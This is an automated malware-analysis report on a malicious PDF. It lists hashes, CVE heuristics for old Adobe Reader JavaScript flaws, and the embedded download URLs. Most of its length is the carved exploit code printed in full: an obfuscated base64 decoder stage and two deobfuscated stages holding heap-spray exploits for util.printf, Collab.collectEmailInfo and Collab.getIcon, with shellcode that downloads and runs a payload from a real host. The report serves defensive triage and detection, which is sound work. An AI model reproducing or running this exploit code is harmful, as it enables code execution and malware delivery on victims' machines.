Malicious PDF — malware analysis report

Static analysis result for SHA-256 7667a002d58fae15…

MALICIOUS

PDF

292.8 KB
MD5: ff7640cdf54581ac9fc21b36f0851a26 SHA-1: 7a0df4a574b0c1b1ab88066b9c1ece87b6fa5ae6 SHA-256: 7667a002d58fae159b97151c2436a011bb671fe407ebff2eb52b2ea08c34241d
578 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple CVEs in Adobe Reader, including CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The deobfuscated JavaScript attempts to download a second-stage payload from the URL http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N. This indicates a multi-stage attack aimed at executing arbitrary code on the victim's machine.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 13

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N?p&x=i813&&s=printf& Referenced by PDF JavaScript
    • http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N?p&x=i813&&s=email&Referenced by PDF JavaScript
    • http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N?p&x=i813&&s=gicon&Referenced by PDF JavaScript
    • http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N?p&x=i813&&s=newp&Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js
6e2b404eb6ad3e3750ab3bf0e042ce7edd0589e8f5b8815800074e42502d9f5f		 pdf-javascript-stream PDF /JS object 8 at offset 0x1CE 99672 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var xxxxxxxxxxxxxxxxxxxxx = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var sss=event;
var ddd=this;
var fff=/TTZZ/ig;
var sfc=String.fromCharCode;
 function qODWlAGQDD1(ByVquSDCvM6) {
     var bEIyjMHkmz2 = "";
     var VhpwwNHdIE31, VhpwwNHdIE32, VhpwwNHdIE33 = "";
     var xzSAVEAcUD41, xzSAVEAcUD42, xzSAVEAcUD43, xzSAVEAcUD44 = "";
     var i = 0;
     var fwInusACcn5 = /[^A-Za-z0-9\+\/\=]/g;
     if (fwInusACcn5["ex"+"ec"](ByVquSDCvM6)) {}
     ByVquSDCvM6 = ByVquSDCvM6.replace(/[^A-Za-z0-9\+\/\=]/g, "");
     do {
        xzSAVEAcUD41 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](ByVquSDCvM6.charAt(i++));
        xzSAVEAcUD42 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](ByVquSDCvM6.charAt(i++));
        xzSAVEAcUD43 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](ByVquSDCvM6.charAt(i++));
        xzSAVEAcUD44 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](ByVquSDCvM6.charAt(i++));
        VhpwwNHdIE31 = (xzSAVEAcUD41 << 2) | (xzSAVEAcUD42 >> 4);
        VhpwwNHdIE32 = ((xzSAVEAcUD42 & 15) << 4) | (xzSAVEAcUD43 >> 2);
        VhpwwNHdIE33 = ((xzSAVEAcUD43 & 3) << 6) | xzSAVEAcUD44;
        bEIyjMHkmz2 = bEIyjMHkmz2 + sfc(VhpwwNHdIE31);
        if (xzSAVEAcUD43 != 63+1) {
           bEIyjMHkmz2 = bEIyjMHkmz2 + sfc(VhpwwNHdIE32);
        }
        if (xzSAVEAcUD44 != 63+1) {
           bEIyjMHkmz2 = bEIyjMHkmz2 + sfc(VhpwwNHdIE33);
        }
        VhpwwNHdIE31 = VhpwwNHdIE32 = VhpwwNHdIE33 = "";
        xzSAVEAcUD41 = xzSAVEAcUD42 = xzSAVEAcUD43 = xzSAVEAcUD44 = "";
     } while (i < ByVquSDCvM6.length);
     return bEIyjMHkmz2;
  }


var ggg="itPa";
var cadka = sss[qODWlAGQDD1("d*&*&*G*&*&*F*&*&*y*&*&*Z*&*&*2*&*&*V*&*&*0*&*&*")];
cadka[qODWlAGQDD1("e*&*&*m*&*&*9*&*&*v*&*&*b*&*&*V*&*&*R*&*&*5*&*&*c*&*&*G*&*&*U*&*&*=*&*&*")] = "F"+ggg+"ge";
var zgggzz = qODWlAGQDD1("Q*&*&*2*&*&*1*&*&*a*&*&*M*&*&*W*&*&*J*&*&*t*&*&*T*&*&*j*&*&*B*&*&*h*&*&*V*&*&*1*&*&*R*&*&*U*&*&*W*&*&*l*&*&*o*&*&*5*&*&*d*&*&*U*&*&*l*&*&*H*&*&*W*&*&*n*&*&*B*&*&*l*&*&*R*&*&*j*&*&*l*&*&*w*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*R*&*&*D*&*&*a*&*&*D*&*&*V*&*&*Z*&*&*W*&*&*E*&*&*p*&*&*6*&*&*Y*&*&*0*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*d*&*&*2*&*&*d*&*&*i*&*&*R*&*&*1*&*&*Z*&*&*1*&*&*S*&*&*1*&*&*N*&*&*C*&*&*N*&*&*1*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*D*&*&*b*&*&*m*&*&*R*&*&*v*&*&*Y*&*&*V*&*&*d*&*&*4*&*&*b*&*&*E*&*&*l*&*&*D*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*g*&*&*1*&*&*W*&*&*V*&*&*h*&*&*K*&*&*e*&*&*m*&*&*N*&*&*D*&*&*N*&*&*X*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*W*&*&*l*&*&*c*&*&*1*&*&*b*&*&*m*&*&*R*&*&*H*&*&*Z*&*&*2*&*&*d*&*&*L*&*&*a*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*B*&*&*e*&*&*U*&*&*l*&*&*E*&*&*d*&*&*2*&*&*d*&*&*i*&*&*R*&*&*1*&*&*Z*&*&*1*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*t*&*&*T*&*&*Q*&*&*j*&*&*d*&*&*l*&*&*V*&*&*0*&*&*Z*&*&*5*&*&*Y*&*&*z*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Q*&*&*W*&*&*d*&*&*L*&*&*e*&*&*j*&*&*B*&*&*n*&*&*Z*&*&*V*&*&*d*&*&*G*&*&*e*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*j*&*&*M*&*&*0*&*&*E*&*&*3*&*&*Z*&*&*l*&*&*F*&*&*w*&*&*N*&*&*V*&*&*l*&*&*Y*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*p*&*&*6*&*&*Y*&*&*0*&*&*N*&*&*B*&*&*O*&*&*U*&*&*l*&*&*I*&*&*b*&*&*G*&*&*h*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Y*&*&*2*&*&*5*&*&*O*&*&*d*&*&*0*&*&*x*&*&*u*&*&*T*&*&*j*&*&*F*&*&*Z*&*&*b*&*&*l*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*O*&*&*M*&*&*G*&*&*N*&*&*t*&*&*b*&*&*H*&*&*V*&*&*a*&*&*e*&*&*W*&*&*d*&*&*3*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*x*&*&*D*&*&*Q*&*&*n*&*&*N*&*&*a*&*&*V*&*&*z*&*&*R*&*&*n*&*&*T*&*&*H*&*&*l*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Q*&*&*X*&*&*l*&*&*L*&*&*V*&*&*H*&*&*R*&*&*5*&*&*W*&*&*l*&*&*h*&*&*S*&*&*M*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*j*&*&*b*&*&*T*&*&*R*&*&*n*&*&*Z*&*&*V*&*&*d*&*&*G*&*&*e*&*&*W*&*&*M*&*&*z*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*E*&*&*3*&*&*Z*&*&*l*&*&*F*&*&*v*&*&*S*&*&*1*&*&*p*&*&*u*&*&*V*&*&*n*&*&*V*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*W*&*&*T*&*&*N*&*&*S*&*&*c*&*&*G*&*&*I*&*&*y*&*&*N*&*&*G*&*&*d*&*&*k*&*&*W*&*&*F*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*S*&*&*c*&*&*G*&*&*J*&*&*G*&*&*O*&*&*X*&*&*d*&*&*j*&*&*b*&*&*W*&*&*x*&*&*1*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*R*&*&*H*&*&*W*&*&*W*&*&*9*&*&*L*&*&*U*&*&*0*&*&*I*&*&*3*&*&*
... (truncated)
generic_stage_recovery_000.js
e493526364c74aaa0090c99e404bf18ad95dbbc504a2231ae779ca8ec114eeaf		 deobfuscated-js generic stage recovery base64-literal-then-strip-TTZZ from JavaScript object 8 at offset 0x1CE 6524 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}

function util_printf() {
var payload = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u7270%u6E69%u6674%u0026%u9000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {bigblock += bigblock;}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 262144) {block = block + block + fillblock;}
var mem_array = new Array;
for (var i = 0; i < 1400; i++) {mem_array[i] = block + heapblock;}
var num = 1.3e+295;
util.printf("%45000f", num);
}

function collab_email() {
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u6D65%u6961%u266C%u9000");
var mem_array = new Array;
var cc = 202116108;
var addr = 4194304;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 56);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 4194304) / addr;
for (var count = 0; count < count2; count++) {mem_array[count] = yarsp + shellcode;}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {overflow += overflow;}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});
}


function collab_geticon() {
if (app.doc.Collab.getIcon) {
var arry = new Array;
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u6967%u6F63%u266E%u9000");
var hWq500CN = vv
... (truncated)
generic_stage_recovery_001.js
bbdd7997c96bbd724552a770462e7420ee49a14ed09c31cf0821132688ea5178		 deobfuscated-js generic stage recovery percent-decode from JavaScript object 8 at offset 0x1CE 6520 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}

function util_printf() {
var payload = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u7270%u6E69%u6674%u0026%u9000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {bigblock += bigblock;}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 262144) {block = block + block + fillblock;}
var mem_array = new Array;
for (var i = 0; i < 1400; i++) {mem_array[i] = block + heapblock;}
var num = 1.3e+295;
util.printf("E000f", num);
}

function collab_email() {
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u6D65%u6961%u266C%u9000");
var mem_array = new Array;
var cc = 202116108;
var addr = 4194304;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 56);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 4194304) / addr;
for (var count = 0; count < count2; count++) {mem_array[count] = yarsp + shellcode;}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {overflow += overflow;}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});
}


function collab_geticon() {
if (app.doc.Collab.getIcon) {
var arry = new Array;
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u6967%u6F63%u266E%u9000");
var hWq500CN = vvpe
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.